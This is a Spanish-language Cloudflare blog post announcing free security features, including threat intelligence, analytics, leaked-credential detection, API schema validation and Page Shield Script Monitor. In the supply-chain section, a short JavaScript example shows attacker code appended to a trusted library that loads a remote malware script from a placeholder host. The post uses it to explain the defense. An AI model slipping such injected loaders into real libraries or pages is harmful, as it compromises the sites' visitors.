Suscríbete para recibir notificaciones de nuevas publicaciones:

Mayor seguridad en Internet con Cloudflare: información sobre amenazas, análisis y nuevas detecciones de amenazas, sin coste

2024-09-24

10 min de lectura
Esta publicación también está disponible en English, 繁體中文, Français, Deutsch, 日本語, 한국어 y 简体中文.

Es probable que cualquier persona que utilice Internet tenga contacto a diario con la red de Cloudflare, ya sea accediendo a un sitio protegido por Cloudflare, utilizando nuestro solucionador 1.1.1.1 o conectándose a través de una red utilizando nuestros productos Cloudflare One.

Esto coloca a Cloudflare en una posición de gran responsabilidad para mejorar la seguridad de Internet para miles de millones de usuarios en todo el mundo. Hoy proporcionamos información sobre amenazas y más de 10 nuevas funciones de seguridad de forma gratuita a todos nuestros clientes. Tanto si utilizas Cloudflare para proteger tu sitio web, tu red doméstica o tu oficina, encontrarás algo útil que puedes empezar a utilizar con solo unos clics.

Estas funciones se centran en algunas de las mayores preocupaciones en materia de ciberseguridad, como los ataques de apropiación de cuentas, los ataques a la cadena de suministro, los ataques contra puntos finales de la API, la visibilidad de la red y las fugas de datos de tu red.

Más seguridad para todos

Puedes leer más sobre cada una de estas funciones en las secciones siguientes, pero queríamos adelantarte un breve resumen.

Si eres un entusiasta de la ciberseguridad: puedes visitar nuestro nuevo sitio web de información sobre amenazas de Cloudforce One para saber más sobre ciberamenazas, campañas de ataque y otros problemas relacionados con la seguridad en Internet.

Si eres propietario de un sitio web: a partir de hoy, todos los planes gratuitos tendrán acceso a Análisis de seguridad para sus zonas. Además, también Análisis de DNS estará disponible a través de GraphQL.

Una vez que tienes visibilidad, se trata de distinguir el tráfico legítimo del tráfico malicioso. Todos los clientes pueden acceder a los servicios siempre activos de detección de ataques de apropiación de cuentas, la validación de esquemas de las API para aplicar un modelo de seguridad positivo en sus puntos finales de la API, y el supervisor de scripts de Page Shield para proporcionar visibilidad de los activos de terceros que cargas desde tu lado y que podrían utilizarse para realizar ataques a la cadena de suministro.

Si utilizas Cloudflare para proteger a tus usuarios y tu red: vamos a agrupar varios de nuestros productos Cloudflare One en una nueva solución gratuita. Este paquete incluirá los productos Zero Trust actuales que ofrecemos de forma gratuita y nuevos productos como Magic Network Monitoring para la visibilidad de la red, Prevención de pérdida de datos para los datos confidenciales y Digital Experience Monitoring para medir la conectividad y el rendimiento de la red. Cloudflare es el único proveedor que ofrece versiones gratuitas de este tipo de productos.

Si eres un usuario nuevo: tenemos nuevas opciones de autenticación. A partir de hoy, presentamos la opción de utilizar la autenticación de Google para registrarse e iniciar sesión en Cloudflare, lo que facilitará el inicio de sesión para algunos de nuestros clientes y reducirá la dependencia de tener que recordar contraseñas, reduciendo así el riesgo de que su cuenta de Cloudflare se vea comprometida.

Y ahora con más detalle:

Información sobre amenazas y análisis

Cloudforce One

Nuestro equipo de operaciones e investigación de amenazas, Cloudforce One, se complace en anunciar el lanzamiento de un sitio web dedicado a la información sobre amenazas y de acceso gratuito. Utilizaremos este sitio para publicar información técnica y ejecutiva sobre las últimas amenazas y tácticas de los ciberdelincuentes, así como información sobre malware, vulnerabilidades y ataques emergentes.

También publicamos dos nuevos elementos de datos en la información sobre amenazas, y prometemos más. Visita el nuevo sitio web aquí para ver las últimas investigaciones, que incluyen un actor persistente alineado con el estado que ataca a organizaciones regionales en el sur y este de Asia, así como el aumento del fraude de transporte de doble intermediación. 

Suscríbete para recibir notificaciones por correo electrónico sobre futuras investigaciones sobre amenazas.

Análisis de seguridad

Análisis de seguridad te ofrece una perspectiva de la seguridad de todo tu tráfico HTTP, no solo de las solicitudes mitigadas, lo que te permite centrarte en lo más importante: el tráfico que se considera malicioso pero que potencialmente no se ha mitigado. Esto significa que, además de utilizar los Eventos de seguridad para ver las medidas de seguridad adoptadas por nuestro conjunto de productos de seguridad para las aplicaciones, puedes utilizar Análisis de seguridad para revisar todo tu tráfico en busca de anomalías o comportamientos extraños y, a continuación, utilizar la información obtenida para elaborar reglas de mitigación precisas. en función de tus patrones de tráfico específicos. A partir de hoy, ponemos esta perspectiva a disposición de los clientes en todos nuestros planes.  Los usuarios de los planes gratuito y Pro ahora tendrán acceso a un nuevo panel de control de Análisis de seguridad, donde tendrás una visión general de tu tráfico en el gráfico de análisis de tráfico, y podrás agrupar y filtrar para concentrarte fácilmente en las anomalías. También puedes ver las principales estadísticas y filtrar por diversas dimensiones, como países, navegadores de origen, sistemas operativos de origen, versiones HTTP, versión del protocolo SSL, estado de la caché y acciones de seguridad.

Análisis de DNS

Todos los usuarios de Cloudflare ahora tienen acceso al nuevo y mejorado panel de control de Análisis de DNS, así como al nuevo conjunto de datos de Análisis de DNS en nuestra eficaz API GraphQL. Ahora puedes analizar fácilmente las consultas DNS enviadas a tus dominios, lo que te puede ayudar a solucionar problemas, detectar patrones y tendencias, o generar informes de uso aplicando filtros eficaces y desglosando las consultas DNS por origen. Con el lanzamiento de Foundation DNS, presentamos una nueva función Análisis de DNS basados en GraphQL. Anteriormente estos análisis solo estaban disponibles para las zonas que utilizaban servidores de nombres avanzados. Sin embargo, debido a la información detallada que proporcionan estos análisis, consideramos que esta función era algo que debíamos poner a disposición de todos los usuarios. A partir de hoy, se puede acceder a la nueva función Análisis de DNS basados en GraphQL en todas las zonas que utilicen el servicio de DNS autoritativo de Cloudflare en Análisis en la sección DNS.

Detección y mitigación de amenazas a las aplicaciones

Detección de la apropiación de cuentas

El 65 % de los usuarios de Internet son vulnerables a la apropiación de cuentas debido a la reutilización de contraseñas y a la creciente frecuencia de grandes fugas de datos. Ayudar a mejorar Internet implica hacer que la protección de cuentas críticas sea fácil y accesible para todos los usuarios.

A partir de hoy, proporcionamos una sólida seguridad para las cuentas que ayuda a prevenir el relleno de credenciales y otros ataques de apropiación de cuentas, a todo el mundo de forma gratuita, ya sean usuarios individuales o grandes empresas, ofreciendo gratis funciones mejoradas como las comprobaciones de credenciales filtradas y las detecciones de apropiación de cuentas. 

Estas actualizaciones incluyen la detección automática de inicios de sesión y la prevención de intentos de descifrar una contraseña por fuerza bruta con una configuración mínima, así como el acceso a una base de datos integral de credenciales filtradas de más de 15 000 millones de contraseñas que contendrá las contraseñas filtradas del servicio Have I been Pwned (HIBP) además de nuestra propia base de datos. Los clientes pueden tomar medidas respecto a las solicitudes de credenciales filtradas mediante las funciones que ofrece el WAF de Cloudflare, como las reglas de limitación de velocidad y las reglas personalizadas, o pueden tomar medidas sobre el origen aplicando la autenticación en varias fases o solicitando un restablecimiento de contraseña basado en un encabezado enviado al origen.

La configuración es sencilla: los usuarios del plan gratuito obtienen detecciones automáticas, mientras que los usuarios de pago pueden activar las nuevas funciones con un solo clic en el panel de control de Cloudflare. Para obtener más información sobre la instalación y la configuración, consulta nuestra documentación y utilízala hoy mismo.

Validación de esquemas de las API

El tráfico de API comprende más de la mitad del tráfico dinámico en la red de Cloudflare. La popularidad de las API ha abierto un nuevo conjunto de vectores de ataque. La validación de esquemas de Cloudflare API Shield es el primer paso para reforzar la seguridad de tus API frente a estas nuevas amenazas. 

Ahora, por primera vez, cualquier cliente de Cloudflare puede utilizar la validación de esquemas para garantizar que solo las solicitudes válidas enviadas a su API lleguen a su origen.

Esta funcionalidad impide la divulgación accidental de información debido a errores, evita que los desarrolladores expongan al azar puntos finales a través de un proceso no estándar y bloquea automáticamente las API zombies, ya que tu inventario de API se mantiene actualizado como parte de tu proceso de CI/CD.

Te sugerimos que utilices la API o el proveedor Terraform de Cloudflare para añadir puntos finales a Cloudflare API Shield y actualizar el esquema después de que se haya publicado tu código como parte de tu proceso de CI/CD posterior a la compilación. De esta forma, API Shield se convierte en una herramienta de inventario de API de referencia, y la validación de esquemas se encargará de las solicitudes enviadas a tu API que no esperas.

Aunque las API tienen que ver con la integración con terceros, a veces las integraciones se realizan cargando bibliotecas directamente en tu aplicación. A continuación, ayudamos a mejorar la seguridad de la web protegiendo a los usuarios contra scripts maliciosos de terceros que roben información confidencial de las entradas en tus páginas.

Prevención de ataques a la cadena de suministro

Las aplicaciones web modernas mejoran las experiencias de sus usuarios y reducen el tiempo de desarrollo mediante el uso de bibliotecas JavaScript de terceros. Debido a su nivel de acceso privilegiado a todo el contenido de la página, una biblioteca JavaScript de terceros en riesgo puede exfiltrar subrepticiamente información confidencial a un atacante sin que el usuario final o el administrador del sitio sea consciente de ello.

Para contrarrestar esta amenaza, lanzamos Page Shield hace tres años. Ahora lanzamos Script Monitor de Page Shield de forma gratuita para todos nuestros usuarios.

Con Script Monitor, verás todos los activos de JavaScript cargados en la página, no solo los que incluyeron tus desarrolladores. ¡Esta visibilidad incluye scripts cargados dinámicamente por otros scripts! Una vez que un atacante ha puesto en riesgo la biblioteca, es muy fácil añadir un nuevo script malicioso sin cambiar el contexto del HTML original y, en su lugar, incluir un nuevo código en el activo JavaScript existente incluido:

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

Script Monitor fue esencial cuando se conoció la noticia del cambio de propiedad de la biblioteca pollyfill.io. Los usuarios de Script Monitor tenían visibilidad inmediata de los scripts cargados en sus sitios y podían saber rápida y fácilmente si estaban en riesgo.

Estamos encantados de ampliar la visibilidad de estos scripts a la mayor parte de la web posible con el lanzamiento de Script Monitor para todos los clientes. Descubre cómo puedes empezar aquí en la documentación.

Los usuarios existentes de Page Shield pueden filtrar inmediatamente los datos supervisados, sabiendo si su aplicación utiliza polyfill.io (o cualquier otra biblioteca). Además, desarrollamos una reescritura de polyfill.io en respuesta al servicio en riesgo, que se activó automáticamente para los planes gratuitos en junio de 2024.

Turnstile como extensión de Google Firebase 

Nos complace anunciar el proveedor de comprobación de aplicaciones Cloudflare Turnstile para Google Firebase, que ofrece una eficaz integración sin necesidad de configuración manual. Con esta nueva extensión, los desarrolladores pueden crear aplicaciones móviles o web en Firebase para proteger sus proyectos contra los bots utilizando la alternativa de Cloudflare a CAPTCHA. Al aprovechar las capacidades de detección y desafío de bot de Turnstile, puedes garantizar que solo los visitantes que sean usuarios humanos auténticos interactúen con tus servicios de backend de Firebase, lo que mejora tanto la seguridad como la experiencia del usuario. Cloudflare Turnstile, una alternativa a CAPTCHA centrada en la privacidad, distingue entre usuarios humanos y bots sin perturbar la experiencia del usuario. A diferencia de las soluciones CAPTCHA tradicionales, que los usuarios suelen abandonar, Turnstile funciona de forma invisible y ofrece varios modos para garantizar interacciones fluidas con los usuarios.

La extensión de comprobación de aplicaciones de Firebase para Turnstile se integra fácilmente, lo que permite a los desarrolladores mejorar rápidamente la seguridad de las aplicaciones con una configuración mínima. Esta extensión también es gratuita con uso ilimitado con el nivel gratuito de Turnstile. Al combinar las ventajas de los servicios de backend de Google Firebase y Cloudflare Turnstile, los desarrolladores pueden ofrecer una experiencia segura y eficaz a sus usuarios. 

Cloudflare One

Cloudflare One es una plataforma integral de perímetro de servicio de acceso seguro (SASE) diseñada para proteger y conectar usuarios, aplicaciones, dispositivos y redes a través de Internet. Combina servicios como el acceso a la red Zero Trust (ZTNA), la puerta de enlace web segura (SWG) y muchos más en una única solución. Cloudflare One puede ayudar a todos a proteger a las personas y las redes, gestionar el control de acceso, proteger contra las ciberamenazas, salvaguardar sus datos y mejorar el rendimiento del tráfico de red direccionándolo a través de la red global de Cloudflare. Sustituye las medidas de seguridad tradicionales ofreciendo un enfoque basado en la nube para proteger y agilizar el acceso a los recursos corporativos.

Ahora todo el mundo tiene acceso gratuito a cuatro nuevos productos que se han añadido a Cloudflare One en los últimos dos años:

Esto se suma a los productos de seguridad de red existentes en la plataforma Cloudflare One:

  • Access para verificar la identidad de los usuarios y permitirles solo utilizar las aplicaciones que deben utilizar.

  • Gateway para proteger el tráfico de red tanto de salida a la red pública como de entrada a tu red privada.

  • Cloudflare Tunnel, nuestros conectores de aplicaciones, que incluyen tanto cloudflared como WARP Connector, para conectar diferentes aplicaciones, servidores y redes privadas a la red de Cloudflare.

  • Cloudflare WARP, nuestro agente de dispositivos, para enviar el tráfico de forma segura desde un portátil o dispositivo móvil a Internet.

Cualquier persona con una cuenta de Cloudflare recibirá automáticamente 50 usuarios gratuitos en todos estos productos en su organización Cloudflare One. Visita nuestra página de los planes Zero Trust y SASE para obtener más información sobre nuestros productos gratuitos y para conocer nuestros planes de pago por uso y de contrato para equipos de más de 50 miembros.

Autenticación con Google

El propio panel de control de Cloudflare se ha convertido en un recurso vital que es necesario proteger, y dedicamos mucho tiempo a garantizar que las cuentas de usuario de Cloudflare no se vean comprometidas.

Para ello, hemos aumentado la seguridad añadiendo métodos de autenticación adicionales, como la autenticación en dos fases (2FA) basada en aplicaciones, las claves de acceso, el inicio de sesión único (SSO) y el inicio de sesión con Apple. Hoy añadimos la posibilidad de registrarse e iniciar sesión con una cuenta de Google. 

Cloudflare admite varios flujos de trabajo de autenticación adaptados a distintos casos de uso. Aunque el inicio de sesión único y las claves de acceso son los métodos de autenticación preferidos y más seguros, creemos que proporcionar factores de autenticación más estrictos que las contraseñas llenará un vacío y aumentará la seguridad media general para nuestros usuarios. Iniciar sesión con Google facilita la vida de nuestros usuarios y evita que tengan que recordar otra contraseña cuando ya están navegando por la web con una identidad de Google.

El inicio de sesión con Google se basa en la especificación OAuth 2.0, y permite a Google compartir de forma segura información de identificación sobre una identidad determinada, al mismo tiempo que garantiza que es Google quien proporciona esta información, evitando cualquier potencial suplantación de Google por parte de entidades maliciosas.

Esto significa que podemos delegar la autenticación a Google, evitando ataques de conocimiento cero directamente en esta identidad de Cloudflare.

Al llegar a la página de inicio de sesión de Cloudflare, verás el siguiente botón. Al hacer clic en él, podrás registrarte en Cloudflare y, una vez que te hayas registrado, podrás iniciar sesión sin escribir ninguna contraseña, utilizando la protección existente que hayas configurado en tu cuenta de Google.

Con el lanzamiento de esta función, Cloudflare utiliza ahora su propio Cloudflare Workers para proporcionar una capa de abstracción para proveedores de identidad compatibles con OIDC (como las cuentas de GitHub y Microsoft), lo que significa que nuestros usuarios pueden esperar ver más compatibilidad de conexión con proveedores de identidad (IdP) en el futuro.

En este momento, solo los nuevos clientes que se registren en Google podrán iniciar sesión con su cuenta de Google, pero implementaremos esta función para un mayor número de nuestros usuarios más adelante, con la capacidad de vincular y desvincular proveedores de inicio de sesión de redes sociales, y añadiremos métodos de inicio de sesión de redes sociales adicionales. Mientras consideramos cómo optimizar las políticas de Access e IdP que se han configurado para proteger tu entorno de Cloudflare, los usuarios Enterprise con una configuración de SSO establecida no podrán utilizar este método en este momento, y aquellos con una configuración de SSO establecida basada en Google Workspace serán reenviados a su flujo de SSO.

Si eres nuevo en Cloudflare y tienes una cuenta de Google, es más fácil que nunca empezar a utilizar Cloudflare para proteger tus sitios web, crear un nuevo servicio o probar cualquiera de los otros servicios que ofrece Cloudflare.

Internet más seguro

Uno de los objetivos de Cloudflare siempre ha sido democratizar las herramientas de ciberseguridad, para que todo el mundo pueda proporcionar contenidos y conectarse a Internet de forma segura, incluso sin los recursos de las grandes organizaciones empresariales.

Hemos decidido ofrecer un amplio conjunto de nuevas funciones de forma gratuita a todos los usuarios de Cloudflare, que abarcan una amplia variedad de casos de uso de seguridad, para administradores web, administradores de red y entusiastas de la ciberseguridad. Inicia sesión en tu cuenta de Cloudflare para empezar a beneficiarte de estos anuncios hoy mismo. Nos encanta recibir comentarios en los foros de nuestra comunidad, y nos comprometemos a mejorar tanto las funciones existentes como las nuevas funciones que estén disponibles más adelante.

Ver en Cloudflare TV

Protegemos redes corporativas completas, ayudamos a los clientes a desarrollar aplicaciones web de forma eficiente, aceleramos cualquier sitio o aplicación web, prevenimos contra los ataques DDoS, mantenemos a raya a los hackers, y podemos ayudarte en tu recorrido hacia la seguridad Zero Trust.

Visita 1.1.1.1 desde cualquier dispositivo para empezar a usar nuestra aplicación gratuita y beneficiarte de una navegación más rápida y segura.

Para saber más sobre nuestra misión para ayudar a mejorar Internet, empieza aquí. Si estás buscando un nuevo rumbo profesional, consulta nuestras ofertas de empleo.
Birthday Week (ES)SeguridadCASBDLPData Loss PreventionThreat IntelligenceZero TrustCloudflare OnePage ShieldLeaked Credential ChecksSASE

Síguenos en X

Michael Tremante|@MichaelTremante
Reid Tatoris|@reidtatoris
Cloudflare|@cloudflare

Publicaciones relacionadas

23 de octubre de 2024, 13:00

Fearless SSH: short-lived certificates bring Zero Trust to infrastructure

Access for Infrastructure, BastionZero’s integration into Cloudflare One, will enable organizations to apply Zero Trust controls to their servers, databases, Kubernetes clusters, and more. Today we’re announcing short-lived SSH access as the first available feature of this integration. ...